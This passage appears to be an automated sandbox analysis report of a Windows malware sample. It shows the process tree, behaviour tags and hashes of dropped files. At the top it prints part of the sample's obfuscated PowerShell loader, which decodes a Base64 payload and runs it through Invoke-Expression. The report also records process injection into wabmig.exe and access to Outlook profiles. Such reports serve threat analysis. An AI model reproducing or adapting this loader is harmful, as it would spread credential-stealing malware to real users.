PljeeNot,trUnindnRubi eMinersKenne Trans=P oto cratG DireeIndryt Terr-KilomCTils oS ormnPrebetEmotieReopenSmugltRet p Manxm$rin.lSA suraEclipc Kly,cRbdigaC pittnonscepapirdFradr ');Misrgt (Echinologist 'Vides$ utpog OverlfirhnoBerimbVandla zonel dkon:AmatrP UvoraKonstrFjer tHattyiCroupkBranda BorgmGollymCurtseu,nderCirc.aNonr t Udls Sabur=Grs n carti[VanfrSKilobyAvo,ts Tj,etM diceKrystmJi te.BevvyCSlveroKorpunFlosvvKhalieDis nr Uns,tCh ff]Oeill:Belli: P,rvFR,adgr DermoPseudm ZastB HestaAn oms Mi,ueRee.s6A sem4 erumSUr.ditProv.rLe.chiNdv,gnsplejgSmidi(I,pli$NeophB Mi.taTon ugL apfaStuditAs.erebrazelGeniilHekseeEnsterB ngnnLicheeUnrepsXant )Kam.e ');Misrgt (Echinologist ' Plan$Time gAilanlEkst.oHasarbbad tabrylll Br k: RoosKEileroRockenTritefPrj iuIrretnYamaldnoto e nderrLgtrieTo ngrDefen Cerem= ivej ,arla[CarilSSulfayPedansUnreftTsa,deF,rstmGe re.HundeTHospieSnri x Gropt Lrke.De,atE Fo tnFrforcTaxemoCreepdReseriNonconGonotgLeg t]Styrk: Ut,k:KonjaAbag.oS UdfoCMicroI BereICumul.JagteGTils.eTealetUnfaiS ncomtPyrolrdispeiUnbehnincorgProto( Reh.$O erdP,krigaBoggrr Ge rtWathfiKineskRegaiaGravemCompemRhab,e.reemrMedieaUps.etAm,lg)Reass ');Misrgt (Echinologist 'Tilse$ K,angReflelPjanko Beg bSjus.aUnstrl ddat:SaddlSGraveeKongesVed.iqNordsuLsniniLivsfbAstiga Femes erriLssedc rbor=Bonds$dampnKBevgeoFrasenHourifV.ljeuPebrenUnderdMena eEjendr Fetie St er Yder.Respes Br,gu Sk ubCanaisStrobtAe,oprTang iSammenTurm gFiske(Repul$ MicrOKontorSor.niPrepagP lsaiOrdren Du la Maken,egertDio.gnDuvesfUbemreHygrokPo metdveskiRasp.oResulnTwadde Titrr orgnUnpaselaagesTitan,Stra $CheckA FervnPseudaAtte,l triky DialsNonmaeAntiav,kyllr Br,skBelbstBevikjS olee MaustpreansA ten)Optio ');Misrgt $Sesquibasic;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1664
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Arbejdsform.Met && echo t"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:576
            • C:\Program Files (x86)\windows mail\wabmig.exe
              "C:\Program Files (x86)\windows mail\wabmig.exe"
              5⤵
              • Accesses Microsoft Outlook profiles
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              • outlook_office_path
              • outlook_win_path
              PID:684

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      342B

      MD5

      be9d88dcb990e5ab8fa4f79dad261461

      SHA1

      482ac82d342c83bf0258cd3c93591c8aec0be3b8

      SHA256

      a64f609b4db1fa56ef0d9459c7983d03489884886aac14e47f194dedbb755a11

      SHA512

      0dbf4a715a66df508835ecb9768a88d0535ccfb62fd976c04afb31fe1be9ff165c8505b98038610bd6fd770b111a0cf0b73b1696d52b6861ffa8ef068def1b49

    • C:\Users\Admin\AppData\Local\Temp\Cab592A.tmp

      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    • C:\Users\Admin\AppData\Local\Temp\TarBEED.tmp

      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    • C:\Users\Admin\AppData\Roaming\Arbejdsform.Met

      Filesize

      464KB

      MD5

      a4c0b389301f9964e5161a6bff9fbccd

      SHA1

      39a12cc4609fad564178a89ac4e9bc18f1b1a702

      SHA256

      120ec684d20b9733bfa77e3876419bb830e2af506d0fabe15c3d9752e37d46cd

      SHA512

      b49f6984f4af9492fe6de0510abd3f55deaff639d59934fa8d7acb4b92c8c0335efc4d8611e1d60b44c224435c3b7e858527e846feeae5695f2c55d0e24a921f

    • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3063565911-2056067323-3330884624-1000\0f5007522459c86e95ffcc62f32308f1_de87a6d6-9d44-4942-9ec6-2be31b435411

      Filesize

      46B

      MD5

      d898504a722bff1524134c6ab6a5eaa5

      SHA1

      e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

      SHA256

      878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

      SHA512

      26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

    • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3063565911-2056067323-3330884624-1000\0f5007522459c86e95ffcc62f32308f1_de87a6d6-9d44-4942-9ec6-2be31b435411

      Filesize

      46B

      MD5

      c07225d4e7d01d31042965f048728a0a

      SHA1

      69d70b340fd9f44c89adb9a2278df84faa9906b7

      SHA256

      8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

      SHA512

      23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0E394WM1FEVWE02SNVH4.temp

      Filesize

      7KB

      MD5

      c96c4121730b1bcac5ea3f92cb874318

      SHA1

      71a6c65c395bc874464369294b4438fa1793a771

      SHA256

      6f7f28b68eaf0a0685349a1f56d037a8a4c71e32709c8c035241627eed5b04df

      SHA512

      9bf03394c866974ea95ba21861207fbd9cc1ad4fedae4a4e080884e51f475205ae2681746f98e4a7c3566487c14d020479ea818ba38d05e77b2f41b696cdcad3

    • memory/684-37-0x0000000000B70000-0x0000000005BE7000-memory.dmp

      Filesize

      80.5MB

    • memory/684-60-0x0000000000B70000-0x0000000005BE7000-memory.dmp

      Filesize

      80.5MB

    • memory/1664-36-0x00000000066F0000-0x000000000B767000-memory.dmp

      Filesize

      80.5MB

    • memory/2560-33-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp

      Filesize

      9.6MB

    • memory/2560-24-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp

      Filesize

      9.6MB

    • memory/2560-27-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp

      Filesize

      9.6MB

    • memory/2560-35-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp

      Filesize

      9.6MB

    • memory/2560-25-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp

      Filesize

      9.6MB

    • memory/2560-26-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp

      Filesize

      9.6MB

    • memory/2560-21-0x000000001B730000-0x000000001BA12000-memory.dmp

      Filesize

      2.9MB

    • memory/2560-23-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp

      Filesize

      9.6MB

    • memory/2560-29-0x000007FEF599E000-0x000007FEF599F000-memory.dmp

      Filesize

      4KB

    • memory/2560-61-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp

      Filesize

      9.6MB

    • memory/2560-22-0x0000000001D90000-0x0000000001D98000-memory.dmp

      Filesize

      32KB

    • memory/2560-20-0x000007FEF599E000-0x000007FEF599F000-memory.dmp

      Filesize

      4KB